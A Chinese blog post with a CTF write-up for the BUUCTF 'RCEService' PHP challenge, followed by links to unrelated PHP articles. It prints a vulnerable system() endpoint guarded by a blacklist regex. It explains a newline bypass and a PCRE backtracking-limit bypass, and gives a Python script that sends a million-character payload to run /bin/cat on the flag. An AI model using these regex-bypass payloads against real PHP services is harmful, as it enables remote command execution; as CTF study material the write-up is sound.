PHP试题之RCEService正则回溯解答

更新时间：2022年04月11日 17:50:34 作者：-栀蓝-

这篇文章主要为大家介绍了PHP试题之RCEService正则回溯解答，有需要的朋友可以借鉴参考下，希望能够有所帮助，祝大家多多进步早日升职加薪

打开题目输入JSON类型的cmd后，尝试读取index.php的源代码，但是读取不出来，并且扫后台出来的/index以及/index/login也没有任何东西，实在不知道怎么做了，只能看一下别人的wp，发现别人以来都是审查源码，我就奇怪了，源码怎么弄来的，看了很多wp发现应该是比赛的时候直接给的源码，但是buu平台忘记加上了

<?php
putenv('PATH=/home/rceservice/jail');
if (isset($_REQUEST['cmd'])) {
    $json = $_REQUEST['cmd'];
    if (!is_string($json)) {
        echo 'Hacking attempt detected<br/><br/>';
    } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
        echo 'Hacking attempt detected<br/><br/>';
    } else {
        echo 'Attempting to run command:<br/>';
        $cmd = json_decode($json, true)['cmd'];
        if ($cmd !== NULL) {
            system($cmd);
        } else {
            echo 'Invalid input';
        }
        echo '<br/><br/>';
    }
}
?>

看到最后的system以及正则，看来这题是要绕过正则执行cmd命令了，这么多黑名单函数应该不会让我们找漏网之鱼吧，不会吧不会吧

我们看到正则表达式没有添加修饰符，那我们可以利用多行匹配这个漏洞了

在这里我们可以利用%0a换行符进行绕过正则匹配，而且可以看到要有修饰符s才会让.*匹配换行符，因此我们这里可以利用我们之前的ls试试能不能成功

发现依然可以出来index.php；源代码中编译了环境变量path（我以为只是单纯暗示我们这个目录），我们就在那个目录下看看

发现了flag文件，我用nl,cat,more,less等命令都读取不出来，查资料发现，系统命令需要有特定的环境变量的也就是路径，系统找不到该路径下的exe文件怎么执行系统命令

因此这个地方查阅资料后发现只能调用绝对路径下的命令，cat命令就在/bin/目录下面

第二种办法也就是正则表达式回溯过多导致false，说实话我还是第一次听到正则的回溯问题

PHP利用PCRE回溯次数限制绕过某些安全限制

简单来说就是正则表达式匹配的时候某个.*将后面的字符全部匹配到了，导致表达式后面的式子没有地方匹配，因此一个一个字符吐出来，直到后面的式子全部匹配完毕或者回溯次数过多

例子

经过自己试试果然只能回溯一百万次

'/^.*

正则表达式最前面的匹配字符，^代表首个字母,'.'代表除换行符之外的所有字符,*代表前面那个表达式重复执行多次，因此他这里直接把我们的payload全部匹配完毕,导致后面的匹配不到字符了，只能一个个回溯

再将后面的匹配一下字符，可以发现目前写的小写字母都没有过滤掉，因为十六进制\x00-\x1f换算成十进制并没有到小写字母的ascii值那个地方，因此我们可以任意利用一个小写字母×个一百万次，就可以让正则表达式直接失败

import requests
url='http://5dd96313-13f8-4eb6-89eb-0dbb5a4ba30a.node3.buuoj.cn'
data={
    'cmd':'{"cmd":"/bin/cat /home/rceservice/flag","feng":"'+'a'*1000000+'"}'
}
r=requests.post(url=url,data=data).text
print(r)

以上就是PHP试题之RCEService正则回溯解答的详细内容，更多关于PHP试题RCEService正则回溯的资料请关注脚本之家其它相关文章！

您可能感兴趣的文章:

getimagesize获取图片尺寸实例
这篇文章主要介绍了getimagesize获取图片尺寸的方法,实例讲述了getimagesize获取图片的尺寸、格式等参数的实现方法,具有一定的参考借鉴价值,需要的朋友可以参考下
2014-11-11
PHP 使用二进制保存用户状态的实例
下面小编就为大家分享一篇PHP 使用二进制保存用户状态的实例，具有很好的参考价值，希望对大家有所帮助。一起跟随小编过来看看吧
2018-01-01
解决Yii2邮件发送结果返回成功，但接收不到邮件的问题
最近在使用Yii2发送邮件的时候遇到了一个问题，发送返回提示成功但并没有收到邮件，所以通过查找相关的资料，下面这篇文章就来给大家介绍了关于如何解决Yii2邮件发送结果返回成功，但接收不到邮件的问题，需要的朋友可以参考下。
2017-05-05
php把大写命名转换成下划线分割命名
这篇文章主要介绍了php把大写命名转换成下划线分割命名,本文讲解对一些不习惯大写风格的命名方法如帕斯卡命名、驼峰命名法进行转换的方法,需要的朋友可以参考下
2015-04-04
php中session过期时间设置及session回收机制介绍
在网上可以找到修改配置文件中的session.gc_maxlifetime，如果想了解更多session回收机制，继续阅读
2014-05-05
php5.3 不支持 session_register() 此函数已启用的解决方法
php从5.2.x升级到5.3.2.出来问题了。有些原来能用的程序报错了，Deprecated: Function session_register() is deprecated
2013-11-11
用vscode运行php的图文详解
这篇文章给大家介绍了使用vscode运行php的操作步骤,文中通过图文结合的方式介绍的非常详细,对大家的学习或工作有一定的帮助,需要的朋友可以参考下
2024-01-01
DedeCMS dede_channeltype表字段注释
学习过程中，可以通过参考别人的代码，让自己的技术进步的更快。
2010-04-04
PHPCMS的使用小结
前段时间仔细看了一下PHPCMS这套开源的系统，实现了程序与模板分离，觉得写得真的不错。本人很少关注开源系统，尤其是PHP的，觉得PHP本身就是一个宠大的函数库，不过几千个系统函数确实解决了不少问题。
2010-09-09
PHP jpgraph库的配置及生成统计图表:折线图、柱状图、饼状图
本篇文章主要介绍了PHP jpgraph库的配置及生成统计图表:折线图、柱状图、饼状图等的相关知识。具有很好的参考价值。下面跟着小编一起来看下吧
2017-05-05